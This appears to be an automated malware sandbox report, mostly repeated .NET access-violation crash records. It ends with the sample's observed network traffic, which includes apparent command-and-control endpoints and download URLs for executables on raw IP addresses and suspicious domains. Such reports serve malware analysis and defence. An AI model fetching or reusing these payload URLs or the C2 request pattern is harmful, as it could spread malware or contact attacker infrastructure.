__exception__ Sept. 6, 2023, 7:41 a.m.	stacktrace: 0x6fd161 0x6fd0db 0x6fc83f 0x6fc14c 0x6f7f50 0x6f34a0 0x6f3126 0x6f1b93 0x6f1b5c DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72072652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7208264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72082e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x721374ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72137610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x721c1dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x721c1e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x721c1f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x721c416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x727cf5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72847f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72844de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5 exception.instruction_r: 8b 52 04 3b 55 dc 0f 8f 39 fe ff ff eb 0c e8 56 exception.instruction: mov edx, dword ptr [edx + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x6fd3dc registers.esp: 3600384 registers.edi: 41758312 registers.eax: 39671096 registers.ebp: 3600444 registers.edx: 0 registers.ebx: 38926496 registers.esi: 39671096 registers.ecx: 0	1
__exception__ Sept. 6, 2023, 7:41 a.m.	stacktrace: 0x6fd161 0x6fd0f8 0x6fc83f 0x6fc14c 0x6f7f50 0x6f34a0 0x6f3126 0x6f1b93 0x6f1b5c DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72072652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7208264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72082e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x721374ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72137610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x721c1dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x721c1e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x721c1f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x721c416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x727cf5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72847f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72844de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5 exception.instruction_r: 8b 52 04 3b 55 dc 0f 8f 39 fe ff ff eb 0c e8 56 exception.instruction: mov edx, dword ptr [edx + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x6fd3dc registers.esp: 3600384 registers.edi: 38925848 registers.eax: 41101112 registers.ebp: 3600444 registers.edx: 0 registers.ebx: 39881072 registers.esi: 41101112 registers.ecx: 0	1
__exception__ Sept. 6, 2023, 7:41 a.m.	stacktrace: 0x6fd161 0x6fd0f8 0x6fc83f 0x6fc14c 0x6f7f50 0x6f34a0 0x6f3126 0x6f1b93 0x6f1b5c DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72072652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7208264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72082e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x721374ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72137610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x721c1dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x721c1e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x721c1f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x721c416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x727cf5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72847f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72844de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5 exception.instruction_r: 8b 52 04 3b 55 dc 0f 8f 39 fe ff ff eb 0c e8 56 exception.instruction: mov edx, dword ptr [edx + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x6fd3dc registers.esp: 3600384 registers.edi: 38925848 registers.eax: 42531060 registers.ebp: 3600444 registers.edx: 0 registers.ebx: 41311020 registers.esi: 42531060 registers.ecx: 0	1
__exception__ Sept. 6, 2023, 7:41 a.m.	stacktrace: 0x6ffb79 0x6fcc6f 0x6fc14c 0x6f7f50 0x6f34a0 0x6f3126 0x6f1b93 0x6f1b5c DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72072652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7208264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72082e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x721374ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72137610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x721c1dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x721c1e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x721c1f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x721c416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x727cf5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72847f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72844de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5 exception.instruction_r: 8b 52 04 3b 55 dc 0f 8f 7f fe ff ff eb 0c e8 6f exception.instruction: mov edx, dword ptr [edx + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x6ffdc3 registers.esp: 3600400 registers.edi: 38925848 registers.eax: 39589996 registers.ebp: 3600452 registers.edx: 0 registers.ebx: 38990172 registers.esi: 39589996 registers.ecx: 0	1
__exception__ Sept. 6, 2023, 7:41 a.m.	stacktrace: 0x6ffb79 0x6fcc6f 0x6fc14c 0x6f7f50 0x6f34a0 0x6f3126 0x6f1b93 0x6f1b5c DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72072652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7208264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72082e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x721374ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72137610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x721c1dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x721c1e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x721c1f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x721c416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x727cf5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72847f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72844de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5 exception.instruction_r: 8b 52 04 3b 55 dc 0f 8f 7f fe ff ff eb 0c e8 6f exception.instruction: mov edx, dword ptr [edx + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x6ffdc3 registers.esp: 3600400 registers.edi: 38919408 registers.eax: 40939696 registers.ebp: 3600452 registers.edx: 0 registers.ebx: 39719640 registers.esi: 40939696 registers.ecx: 0	1
__exception__ Sept. 6, 2023, 7:41 a.m.	stacktrace: 0x6ffb79 0x6fcc6f 0x6fc14c 0x6f7f50 0x6f34a0 0x6f3126 0x6f1b93 0x6f1b5c DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72072652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7208264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72082e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x721374ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72137610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x721c1dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x721c1e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x721c1f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x721c416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x727cf5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72847f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72844de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5 exception.instruction_r: 8b 52 04 3b 55 dc 0f 8f 7f fe ff ff eb 0c e8 6f exception.instruction: mov edx, dword ptr [edx + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x6ffdc3 registers.esp: 3600400 registers.edi: 38919408 registers.eax: 42289396 registers.ebp: 3600452 registers.edx: 0 registers.ebx: 41069340 registers.esi: 42289396 registers.ecx: 0	1
__exception__ Sept. 6, 2023, 7:41 a.m.	stacktrace: 0x6ffe49 0x6fcd35 0x6fc14c 0x6f7f50 0x6f34a0 0x6f3126 0x6f1b93 0x6f1b5c DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72072652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7208264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72082e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x721374ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72137610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x721c1dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x721c1e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x721c1f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x721c416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x727cf5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72847f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72844de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5 exception.instruction_r: 8b 40 04 3b 45 dc 0f 8f e7 fe ff ff eb 0c e8 21 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x7a20211 registers.esp: 3600400 registers.edi: 38919408 registers.eax: 0 registers.ebp: 3600452 registers.edx: 0 registers.ebx: 42419112 registers.esi: 43639160 registers.ecx: 0	1
__exception__ Sept. 6, 2023, 7:41 a.m.	stacktrace: 0x6ffe49 0x6fcd35 0x6fc14c 0x6f7f50 0x6f34a0 0x6f3126 0x6f1b93 0x6f1b5c DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72072652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7208264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72082e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x721374ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72137610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x721c1dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x721c1e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x721c1f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x721c416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x727cf5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72847f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72844de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5 exception.instruction_r: 8b 40 04 3b 45 dc 0f 8f e7 fe ff ff eb 0c e8 21 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x7a20211 registers.esp: 3600400 registers.edi: 38919408 registers.eax: 0 registers.ebp: 3600452 registers.edx: 0 registers.ebx: 43908048 registers.esi: 45128096 registers.ecx: 0	1
__exception__ Sept. 6, 2023, 7:41 a.m.	stacktrace: 0x6ffe49 0x6fcd35 0x6fc14c 0x6f7f50 0x6f34a0 0x6f3126 0x6f1b93 0x6f1b5c DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72072652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7208264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72082e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x721374ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72137610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x721c1dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x721c1e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x721c1f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x721c416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x727cf5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72847f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72844de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5 exception.instruction_r: 8b 40 04 3b 45 dc 0f 8f e7 fe ff ff eb 0c e8 21 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x7a20211 registers.esp: 3600400 registers.edi: 38919408 registers.eax: 0 registers.ebp: 3600452 registers.edx: 0 registers.ebx: 39403476 registers.esi: 40356008 registers.ecx: 0	1
__exception__ Sept. 6, 2023, 7:41 a.m.	stacktrace: 0x7a20369 0x6fcdd7 0x6fc14c 0x6f7f50 0x6f34a0 0x6f3126 0x6f1b93 0x6f1b5c DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72072652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7208264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72082e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x721374ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72137610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x721c1dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x721c1e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x721c1f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x721c416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x727cf5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72847f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72844de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5 exception.instruction_r: 8b 40 04 3b 45 dc 0f 8f 05 ff ff ff eb 0c e8 f8 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x7a2053a registers.esp: 3600400 registers.edi: 42110292 registers.eax: 0 registers.ebp: 3600452 registers.edx: 0 registers.ebx: 40624976 registers.esi: 41845024 registers.ecx: 0	1
__exception__ Sept. 6, 2023, 7:41 a.m.	stacktrace: 0x7a20369 0x6fcdd7 0x6fc14c 0x6f7f50 0x6f34a0 0x6f3126 0x6f1b93 0x6f1b5c DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72072652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7208264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72082e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x721374ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72137610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x721c1dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x721c1e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x721c1f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x721c416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x727cf5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72847f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72844de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5 exception.instruction_r: 8b 40 04 3b 45 dc 0f 8f 05 ff ff ff eb 0c e8 f8 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x7a2053a registers.esp: 3600400 registers.edi: 42110292 registers.eax: 0 registers.ebp: 3600452 registers.edx: 0 registers.ebx: 42116244 registers.esi: 43336292 registers.ecx: 0	1
__exception__ Sept. 6, 2023, 7:41 a.m.	stacktrace: 0x7a20369 0x6fcdd7 0x6fc14c 0x6f7f50 0x6f34a0 0x6f3126 0x6f1b93 0x6f1b5c DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72072652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7208264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72082e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x721374ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72137610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x721c1dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x721c1e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x721c1f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x721c416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x727cf5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72847f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72844de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5 exception.instruction_r: 8b 40 04 3b 45 dc 0f 8f 05 ff ff ff eb 0c e8 f8 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x7a2053a registers.esp: 3600400 registers.edi: 38990324 registers.eax: 0 registers.ebp: 3600452 registers.edx: 0 registers.ebx: 38990504 registers.esi: 39702436 registers.ecx: 0	1
__exception__ Sept. 6, 2023, 7:41 a.m.	stacktrace: 0x7a208ec 0x6fc164 0x6f7f50 0x6f34a0 0x6f3126 0x6f1b93 0x6f1b5c DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72072652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7208264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72082e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x721374ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72137610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x721c1dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x721c1e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x721c1f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x721c416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x727cf5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72847f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72844de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5 exception.instruction_r: 8b 40 04 3b 45 e0 0f 8f a1 fe ff ff eb 05 e8 00 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x7a20d32 registers.esp: 3600860 registers.edi: 40247032 registers.eax: 0 registers.ebp: 3600904 registers.edx: 0 registers.ebx: 40240824 registers.esi: 40247716 registers.ecx: 0	1

One or more potentially interesting buffers were extracted, these generally contain injected code, configuration data, etc.

HTTP traffic contains suspicious features which may be indicative of malware related traffic (12 events)

suspicious_features	GET method with no useragent header, Connection to IP address	suspicious_request	GET http://193.42.32.118/api/tracemap.php
suspicious_features	GET method with no useragent header, Connection to IP address	suspicious_request	GET http://94.142.138.131/api/tracemap.php
suspicious_features	POST method with no referer header, Connection to IP address	suspicious_request	POST http://94.142.138.131/api/firecom.php
suspicious_features	Connection to IP address	suspicious_request	HEAD http://94.156.253.187/download/WWW14_n.exe
suspicious_features	Connection to IP address	suspicious_request	GET http://94.156.253.187/download/WWW14_n.exe
suspicious_features	POST method with no referer header, Connection to IP address	suspicious_request	POST http://94.142.138.131/api/firegate.php
suspicious_features	Connection to IP address	suspicious_request	GET http://45.15.156.229/api/tracemap.php
suspicious_features	POST method with no referer header, Connection to IP address	suspicious_request	POST http://45.15.156.229/api/firegate.php
suspicious_features	Connection to IP address	suspicious_request	HEAD http://45.9.74.80/ummaa.exe
suspicious_features	Connection to IP address	suspicious_request	HEAD http://45.9.74.80/super.exe
suspicious_features	Connection to IP address	suspicious_request	GET http://45.9.74.80/ummaa.exe
suspicious_features	Connection to IP address	suspicious_request	GET http://45.9.74.80/super.exe

Performs some HTTP requests (40 events)

request	GET http://193.42.32.118/api/tracemap.php
request	GET http://apps.identrust.com/roots/dstrootcax3.p7c
request	GET http://94.142.138.131/api/tracemap.php
request	POST http://94.142.138.131/api/firecom.php
request	GET http://www.maxmind.com/geoip/v2.1/city/me
request	HEAD http://94.156.253.187/download/WWW14_n.exe
request	GET http://94.156.253.187/download/WWW14_n.exe
request	POST http://94.142.138.131/api/firegate.php
request	HEAD http://red.mk/netTime.exe
request	GET http://red.mk/netTime.exe
request	GET http://45.15.156.229/api/tracemap.php
request	POST http://45.15.156.229/api/firegate.php
request	HEAD http://45.9.74.80/ummaa.exe
request	HEAD http://45.9.74.80/super.exe
request	GET http://45.9.74.80/ummaa.exe
request	GET http://45.9.74.80/super.exe
request	HEAD http://230809204625331.nes.dtf99.top/f/fikim0809331.exe
request	GET http://230809204625331.nes.dtf99.top/f/fikim0809331.exe
request	GET https://yandex.ru/
request	GET https://dzen.ru/?yredirect=true
request	GET https://sso.passport.yandex.ru/push?uuid=bc95c885-a33d-4f0b-a172-5792d56f2b99&retpath=https%3A%2F%2Fdzen.ru%2F%3Fyredirect%3Dtrue
request	GET https://db-ip.com/
request	POST https://api.db-ip.com/v2/p31e4d59ee6ad1a0b5cc80695a873e43a8fbca06/self
request	GET https://api.myip.com/
request	GET https://vk.com/doc746114504_647280747?hash=cvDFKP5q0CQEjBCbeoeHvPNrWE0xbMxZEmrkIeNKcET&dl=G42DMMJRGQ2TANA:1661413520:uZNj68vRUvQaydRD8wpAK8zluN0I7otw5AHbA1ZlN9T&api=1&no_preview=1
request	GET https://sergejbukotko.com/7725eaa6592c80f8124e769b4e8a07f7.exe
request	GET https://preconcert.pw/setup294.exe
request	GET https://vk.com/doc44017378_668841700?hash=B7naXG9fPpueUKaZxzbzFzqgThiLopd9A232GVSoLbD&dl=VDCn0RuU4RRcIuzpA6hHZu4JCvVt7UCUAmWFRORbSKs&api=1&no_preview=1
request	GET https://vk.com/doc44017378_668913178?hash=82bcV2gCZ1FH8Z8HToaxuiwCiEN2mz2z1qfoXJTCPC0&dl=ErxeeY7X3LIyZIBiZ0QDMkzCLk2vvDO29uX36h22aek&api=1&no_preview=1#u9
